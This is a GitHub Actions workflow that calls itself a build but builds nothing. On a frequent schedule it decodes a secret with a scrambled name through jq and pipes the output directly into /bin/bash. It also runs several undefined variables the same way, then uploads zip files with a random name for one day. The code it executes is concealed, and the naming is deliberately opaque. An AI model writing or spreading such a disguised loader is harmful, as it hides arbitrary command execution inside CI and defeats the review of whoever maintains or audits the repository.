name: Build Workflow
on:
  workflow_dispatch:

  schedule:
    - cron: '33 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  handler:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          qrd15131: ${{ secrets.qrd15131 }}
        run: |
          printf '%s' "$qrd15131" | jq -r .cx861 | /bin/bash
          printf '%s' "$sa9742" | jq -r .sao74980 | /bin/bash
          echo $wzh65509 | jq -r .rhd31711 | /bin/bash
          printf '%s' "$yewf8" | jq -r .j2 | /bin/bash

      - name: Persist output
        uses: actions/upload-artifact@v4
        with:
          name: h8wqIsat
          path: "*.zip"
          retention-days: 1
